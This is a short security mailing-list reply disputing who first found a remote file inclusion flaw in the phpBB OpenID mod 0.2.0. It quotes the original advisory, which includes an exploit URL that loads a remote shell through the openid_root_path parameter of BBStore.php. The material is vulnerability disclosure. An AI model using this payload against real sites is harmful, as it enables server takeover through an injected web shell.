Re: phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion
Seph1roth likes to cut and paste.
original author = xoron.
link: http://www.milw0rm.com/exploits/4471
/str0ke
h3llcode@xxxxxxxxxx wrote:
> +++++++++++++++++++++++++++++++++++++++++++++++++++
> +
> + phpBB Mod OpenID 0.2.0 BBStore.php RFI
> + Risk: High
> + Found by Seph1roth
> + Site: http://blackroots.it
> +
> +++++++++++++++++++++++++++++++++++++++++++++++++++
>
> + Vulnerable Script Download:
> http://sourceforge.net/project/showfiles.php?group_id=178846
>
> + Exploit:
> http://www.victim.it/path/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=[Shell]
>
>